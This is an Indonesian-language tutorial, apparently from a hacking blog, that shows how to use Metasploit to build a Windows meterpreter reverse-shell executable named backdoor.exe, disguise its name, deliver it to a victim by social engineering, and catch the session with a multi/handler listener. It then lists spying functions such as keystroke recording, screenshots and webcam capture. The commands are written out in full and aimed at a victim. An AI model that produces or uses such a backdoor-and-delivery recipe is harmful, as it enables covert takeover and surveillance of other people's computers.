Sebelum kita jalankan Metasploit, kita perlu membuat payload dalam framework untuk mendapatkan shell meterpreter. Untuk membuat jenis payload ini di terminal tanpa tanda kutip:
msfpayload windows/meterpreter/reverse_tcp LHOST=”your Local IP” LPORT=”listening port” x > /root/backdoor.exe
Saya menggunakan port 4444 (Anda dapat memilih port Anda sendiri) untuk LPORT yang merupakan port mendengarkan dan mengatur LHOST ke IP dari penyerang remote yang jelas alamat IP lokal Anda, IP saya adalah 192.168.10.5.
Setelah itu, Anda harus dapat melihat file bernama sebagai backdoor.exe di / root. Mengirim file ke korban dengan menggunakan keterampilan Rekayasa kalian dan biarkan dia klik file tersebut. Anda dapat mengubah nama file sehingga tidak terlalu jelas.
Peluncuran Metasploit dan mengatur mengeksploitasi dengan mengetikkan perintah ini di msfconsole kalian:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.10.5
set lport 4444
exploit
Jika semua berjalan dengan baik, Kalian harus dapat membuat sesi meterpreter. Ketik sysinfo untuk mengumpulkan beberapa info tentang mesin. Untuk mengetahui perintah lain untuk jenis meterpreter bantuan. Ada juga perintah meterpreter lain seperti menangkap screenshot dari PC, merekam keystrokes, menangkap snapshot dari webcam, dll Untuk memasukkan perintah shell dari mesin, jenis shell.
itu, keren untuk mengambil screenshot dengan meterpreter perintah screenshot.